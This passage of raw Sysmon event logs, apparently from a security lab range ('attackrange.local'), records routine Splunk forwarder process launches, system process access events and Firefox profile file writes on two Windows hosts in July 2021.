10341000x8000000000000000808091Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808090Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808089Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.987{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808088Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.972{0C1E0330-F56C-60EB-8979-00000000D001}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000808087Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.518{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E07A5B144CCC7FA4790C683374F61498,SHA256=05F844FED8BF87B096867346D0C729D86A0AE6DA720F9DB7CBD3BB4DE95415D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808086Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.456{0C1E0330-F56C-60EB-8879-00000000D001}216404C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808085Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808084Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808083Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808082Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808081Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808080Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808079Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808078Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808077Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808076Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808075Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808074Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.300{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808073Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:24.285{0C1E0330-F56C-60EB-8879-00000000D001}216C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=84DD8DD9B630C79612DD719EB7F695D6,SHA256=BC2902B6753E16CE3EE899A47EC4EFC39407B70382155535B906BED4B5F29983,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=085CB734079B7A7A23F48895483396E8,SHA256=EEC0704E12F5AF69A1421ACB3D1CDCCDF3C37AEF4EF405C527025C61878295DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09A8B4D9A465969D5A172E0B88E3549B,SHA256=861BDA6E6B6F2C295F323537A713DCAED68F5FD7BCF218FFB4335BB16698EF32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CB85B63B6D5BA2D195CBA9E769002982,SHA256=7D17A0F09BE54347C86976B18905E017B231042261041E8D279B0C60DA5D7033,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B95AB657C0737018AD6CEA32ECE7424B,SHA256=7CD3E70E06D7AA498B9C949F7FDBEFC024B03E3077CF247144D75907536CE8A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED3B344CDD8AC4537DBEA55B9D3E088B,SHA256=93053A76470A7507794E0AA15EA6FAB56B2C68212845AA9B515424BEFB80DE6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FA952992D0A3793C57EF3CA1A0DBE7EF,SHA256=381D81532586F662DCB5A19DDB3600317B3DA8732E8804F2BA68F1E302E3A3B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9B662B1DEBFE73366BA33EB721DD61FC,SHA256=B512C19D42ACE91545139FF32FC31262DED1AA4AECAA3F2C034F42CA70BDA5FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3950F34CCFA2C4AA2DD907B8C6286442,SHA256=C37F0AF6F66DB51C791D55E9EE9C1B9381BAD37FC06C5E8F9704C7E54E1C4A90,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=09296DE9B4F7B939DA732D00587ADF19,SHA256=34185B019BC98310D428C91CA2689A03B941CC241528ABD3A7EDD17120244923,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:55:25.880{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=035780D07CC5F33F0EC096FA073EF7F9,SHA256=F4733CDB8A6D851EA21CE06B39FDC95FD30D95052EE3F594096E195ADCA117D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:55:25.811{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=273A20FAF6060562F3ECE3B97269BD94,SHA256=E70F22BC282816B04325E82417F1E0B1ECD89F95EAE2E39A216E28E1FA74F5F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.753{0C1E0330-F56D-60EB-8A79-00000000D001}9523884C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:55:25.612{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F56D-60EB-8A79-00000000D001}952C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:55:25.612{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SY